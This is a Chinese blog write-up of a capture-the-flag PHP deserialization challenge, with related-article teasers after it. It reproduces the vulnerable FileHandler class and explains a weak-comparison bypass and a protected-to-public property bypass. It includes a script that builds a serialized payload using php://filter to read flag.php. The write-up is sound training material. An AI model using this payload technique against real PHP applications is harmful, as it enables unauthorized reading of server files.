序列化2之[网鼎杯 2020 青龙组]AreUSerialz1

最新推荐文章于 2024-01-21 11:13:41 发布
最新推荐文章于 2024-01-21 11:13:41 发布
阅读量2.2k 收藏
点赞数
分类专栏: CTF知识点 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/124227717
版权 
class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct(){
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

这里面的函数通过分析可知:_construct函数可以不管,因为在反序列化时是不会自动调用的,在创建一个新对象时会调用,而_destruct是在销毁一个对象时调用,而PHP中大部分都会自动调用他,这里面说,不能让op==="2",注意是字符2,所以我们可以让op=2,整数2,在process里面是弱比较,可以通成功执行read函数,达到读取flag.php 的目的;然后就是

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

这个函数主要是过滤掉protect类的成员在序列化的时候是以%00作为标识符但是在PHP版本大于7.1的情况下,protect类和public类没什么好注意的,所以在构造序列化时改为public可以绕过is_valid函数,构造PHP序列化:


<?php
highlight_file(__FILE__);
class FileHandler {

    public $op=2;
    public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
   public $content;
}

$str = new FileHandler();
echo serialize($str);
?>

这里的filenam用了伪协议吧内容base64加密显示出来,也可以不用,直接flag.php也可以

由于没学过PHP,原来写diamante的时候,类里面只要说明变量即可,就和struct一样; 

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[网鼎杯 2020 青龙]AreUSerialz 1
bazzza的博客
12-21 2177
打开靶场,是一道php代码审计的题目,是个反序列化的题目 分块对代码进行分析,先分析输入部分 function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//限制字符串的范围 return false; return true; } if(isset($_GET{'st
网鼎杯2022白虎题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎,ctf
[网鼎杯 2020 青龙]AreUSerialz1
陈艺秋的博客
07-05 674
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法。
[网鼎杯 2020 青龙]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3033
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
BUU实战笔记——[网鼎杯 2020 青龙]AreUSerialz1
qq_51175992的博客
07-14 115
方向很明确的PHP反序列化题,找到两个特征之后,再找对象、属性及属性的值就可以做出来啦!
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 496
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
C#之JSON序列化和反序列化
最新发布
05-09
C#之JSON序列化和反序列化
asp.net xml序列化与反序列化第1/2页
01-01
在网上找了一些关于xml序列化与反序列化的资料,摘录下: 在.NET下有一种技术叫做对象序列化,它可以将对象序列化为二进制文件、XML文件、SOAP文件,这样, 使用经过序列化的流进行传输效率就得到了大大的提升。...
Python之序列化共8页.pdf.zip
10-31
Python之序列化共8页.pdf.zip
Java Socket网络传输的序列化机制
08-10
绍Java Socket网络传输的序列化机制
CTF学习-WEB-PHP反序列化-[网鼎杯 2020 青龙]AreUSerialz 1
qq_43564182的博客
07-13 615
步骤思路 第一:获取flag存储flag.php 第二:两个魔术方法__destruct __construct 第三:传输str参数数据后触发destruct,存在is_valid过滤 第四:__destruct中会调用process,其中op=1写入及op=2读取 第五:涉及对象FileHandler,变量op及filename,content,进行构造输出** 解题 打开网页发现如下代码: <?php include("flag.php"); highlight_file(__FILE__
2020网鼎杯青龙)--WEB--AreUSerialz(反序列化
a965527596的博客
05-17 2305
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
序列化 [网鼎杯 2020 青龙]AreUSerialz 1
m0_75178803的博客
11-06 218
protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00。if 语句中的判断语句用的是弱类型的比较,那么只要op=2,这个是int整数型的2, op == "2"则为True,就可以进入read函数。从__destruct()代码中可以看到,这里 if 中的判断语句用的是强类型比较。
[网鼎杯 2020 青龙]AreUSerialz(超详细)
2201_75955146的博客
10-22 298
一周一更,这是第二周啦,还是一道PHP审计题。学了蛮久了,终于算是懂了一点了。话不多说,直接开始。感觉好难学啊!哎,慢慢来吧,会熬出头的。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz1
m0_73995922的博客
12-21 258
1.首先因为题目类型是protected,在我们进行序列化时会产生%00*%00,%00对应ASCII码0,这里我们可以利用php7.1+版本对属性类型不敏感,在序列化时将类型改为public。但是我们看到is_valid对我们的payload进行了限制 需要我们输入的字符串的字符ASCII码在32-125之间。2.然后是===强等绕过 可以将 op=(int)2 将op改为int类型。同时我们还需要绕过_destruct() 也就是绕过 op==='2'我们需要使op==2。查看源码得到flag。
[网鼎杯 2020 青龙]AreUSerialz
qq_52907838的博客
05-26 99
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel.
web buuctf [网鼎杯 2020 青龙]AreUSerialz1
weixin_44214568的博客
03-17 789
1.代码审计(魔法函数,序列化) 2.成员变量关键字 public、protected、private 代码粘贴如下: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
buuctf-AreUSerialz
m0_62094846的博客
03-24 1512
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "He.
php 反序列化 性能,PHP反序列化详解
weixin_32818917的博客
03-10 232
首先看一张图PHP反序列化 原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。serialize()//将一个对象转换成一个字符串unserialize()//将字符串还原成一个对象反序列化分为有类和无类我们先来看序列化数...
fastjson2 怎么做枚举的序列化以及反序列化
06-09
在 fastjson2 中,可以通过以下方式来实现枚举的序列化以及反序列化: 1. 枚举的序列化 枚举类型默认会被序列化为该枚举常量的名称,可以通过实现 fastjson 序列化器接口来自定义枚举的序列化方式。例如,以下是一个将枚举类型序列化为枚举常量值的示例: ```java public class EnumSerializer implements ObjectSerializer { @Override public void write(JSONSerializer serializer, Object object, Object fieldName, Type fieldType, int features) throws IOException { if (object == null) { serializer.getWriter().writeNull(); return; } Enum<?> e = (Enum<?>) object; serializer.getWriter().writeValue(e.ordinal()); } } ``` 然后,在序列化时,可以将该序列化器指定给需要自定义序列化的枚举类型,例如: ```java SerializeConfig config = new SerializeConfig(); config.put(MyEnum.class, new EnumSerializer()); String json = JSON.toJSONString(myEnum, config); ``` 2. 枚举的反序列化 fastjson2 默认会将枚举类型反序列化为该枚举常量的名称,可以通过实现 fastjson 反序列化器接口来自定义枚举的反序列化方式。例如,以下是一个将枚举类型反序列化为枚举常量值的示例: ```java public class EnumDeserializer implements ObjectDeserializer { @Override public <T> T deserialze(DefaultJSONParser parser, Type type, Object fieldName) { JSONObject jsonObject = parser.parseObject(); int ordinal = jsonObject.getIntValue("ordinal"); return (T) MyEnum.values()[ordinal]; } @Override public int getFastMatchToken() { return JSONToken.LBRACE; } } ``` 然后,在反序列化时,可以将该反序列化器指定给需要自定义反序列化的枚举类型,例如: ```java ParserConfig config = new ParserConfig(); config.putDeserializer(MyEnum.class, new EnumDeserializer()); MyEnum myEnum = JSON.parseObject(json, MyEnum.class, config); ``` 这样就可以实现枚举类型的自定义序列化以及反序列化了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值